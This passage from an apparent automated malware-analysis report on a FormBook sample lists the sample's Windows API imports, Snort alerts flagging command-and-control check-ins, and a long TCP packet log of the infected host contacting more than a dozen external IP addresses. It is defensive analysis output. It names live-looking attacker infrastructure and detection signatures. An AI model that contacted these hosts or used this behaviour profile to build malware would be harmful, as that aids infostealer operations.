SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/13/24-11:06:31.339003	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49755	80	192.168.2.5	103.120.80.111
06/13/24-11:05:34.560017	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49739	80	192.168.2.5	123.58.214.101
06/13/24-11:05:20.481791	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49735	80	192.168.2.5	176.113.70.180
06/13/24-11:05:06.712005	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49731	80	192.168.2.5	35.241.34.216
06/13/24-11:06:45.183947	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49759	80	192.168.2.5	64.226.69.42
06/13/24-11:06:03.618855	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49747	80	192.168.2.5	162.0.213.72
06/13/24-11:03:39.607365	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49710	80	192.168.2.5	123.58.214.101
06/13/24-11:06:17.125610	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49751	80	192.168.2.5	217.116.0.191
06/13/24-11:06:58.931593	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49763	80	192.168.2.5	15.197.204.56
06/13/24-11:04:17.415823	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49719	80	192.168.2.5	34.149.87.45
06/13/24-11:04:52.322406	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49727	80	192.168.2.5	102.222.124.13
06/13/24-11:04:03.460664	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49715	80	192.168.2.5	85.13.162.190
06/13/24-11:04:31.072978	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49723	80	192.168.2.5	116.213.43.190
06/13/24-11:05:49.182845	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49743	80	192.168.2.5	103.138.88.32

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 13, 2024 11:03:39.598192930 CEST	49710	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:03:39.603159904 CEST	80	49710	123.58.214.101	192.168.2.5
Jun 13, 2024 11:03:39.603240967 CEST	49710	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:03:39.607364893 CEST	49710	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:03:39.612292051 CEST	80	49710	123.58.214.101	192.168.2.5
Jun 13, 2024 11:03:40.565907001 CEST	80	49710	123.58.214.101	192.168.2.5
Jun 13, 2024 11:03:40.607485056 CEST	49710	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:03:40.754055023 CEST	80	49710	123.58.214.101	192.168.2.5
Jun 13, 2024 11:03:40.754307985 CEST	49710	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:03:40.757313967 CEST	49710	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:03:40.762676001 CEST	80	49710	123.58.214.101	192.168.2.5
Jun 13, 2024 11:03:55.863676071 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:55.868885040 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:55.868976116 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:55.870724916 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:55.875600100 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.794821024 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.794871092 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.794909000 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.794943094 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.794977903 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.795011997 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.795046091 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.795078993 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.795099974 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.795099974 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.795099974 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.795113087 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.795150042 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.795183897 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.795507908 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.800148964 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.800204039 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.803922892 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.932828903 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.932882071 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.932920933 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.932955980 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933013916 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933047056 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933083057 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.933084011 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.933093071 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933146954 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933161974 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.933183908 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933219910 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933242083 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.933281898 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.933897972 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933934927 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933969975 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.933990955 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:56.934004068 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.934039116 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:56.934091091 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:57.070775986 CEST	80	49712	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:57.070982933 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:57.373275042 CEST	49712	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:58.391189098 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:58.396349907 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:58.399951935 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:58.401470900 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:58.406550884 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375355005 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375413895 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375449896 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375485897 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375519037 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375550032 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.375554085 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375586987 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375623941 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375674009 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375708103 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.375708103 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.375708103 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.375713110 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.375771046 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.380634069 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.380690098 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.380724907 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.380749941 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.381051064 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.381107092 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.518523932 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518598080 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518635035 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518667936 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518670082 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.518702984 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518716097 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.518737078 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518770933 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518783092 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.518807888 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.518857002 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.519309998 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519344091 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519377947 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519539118 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.519634008 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519768953 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.519793034 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519829988 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519865036 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519891977 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.519968987 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.519996881 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.661408901 CEST	80	49713	85.13.162.190	192.168.2.5
Jun 13, 2024 11:03:59.662976980 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:03:59.904522896 CEST	49713	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:00.926800013 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:00.932019949 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:00.932128906 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:00.934247017 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:00.939213037 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:00.939321041 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.862759113 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.862831116 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.862868071 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.862901926 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.862937927 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.862970114 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.863006115 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.863038063 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.863070965 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.863106012 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.863110065 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:01.863110065 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:01.863111019 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:01.863111019 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:01.863214016 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:01.868380070 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.868428946 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.868464947 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:01.868630886 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.000145912 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000195026 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000251055 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000267982 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.000303984 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000339985 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000354052 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.000372887 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000420094 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.000426054 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000463009 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.000519037 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.000520945 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.001207113 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.001259089 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.001260996 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.001296043 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.001343966 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.001368046 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.001400948 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.001449108 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.002115965 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.048011065 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.138094902 CEST	80	49714	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:02.138277054 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:02.435761929 CEST	49714	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:03.453753948 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:03.459048033 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:03.459147930 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:03.460664034 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:03.465648890 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442004919 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442070961 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442107916 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442142963 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442177057 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442193031 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.442207098 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442240953 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442276001 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442287922 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.442287922 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.442310095 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442346096 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.442353010 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.442414999 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.447259903 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.447293997 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.447329044 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.447346926 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.447351933 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.447438955 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.581835985 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.581882954 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.581939936 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.581978083 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582007885 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582043886 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582060099 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.582060099 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.582077980 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582093000 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.582387924 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582422972 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582453012 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.582458973 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582494020 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.582499027 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.582993031 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.583028078 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.583054066 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.583062887 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.583113909 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.583153009 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.583189011 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.583236933 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.583954096 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.623084068 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.720436096 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:04.720808029 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.725234985 CEST	49715	80	192.168.2.5	85.13.162.190
Jun 13, 2024 11:04:04.730320930 CEST	80	49715	85.13.162.190	192.168.2.5
Jun 13, 2024 11:04:09.779159069 CEST	49716	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:09.785552979 CEST	80	49716	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:09.785752058 CEST	49716	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:09.788253069 CEST	49716	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:09.794539928 CEST	80	49716	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:10.435235977 CEST	80	49716	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:10.436878920 CEST	80	49716	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:10.437058926 CEST	49716	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:11.295171976 CEST	49716	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:12.338000059 CEST	49717	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:12.343075991 CEST	80	49717	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:12.343189001 CEST	49717	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:12.345733881 CEST	49717	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:12.350651979 CEST	80	49717	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:12.974771976 CEST	80	49717	34.149.87.45	192.168.2.5
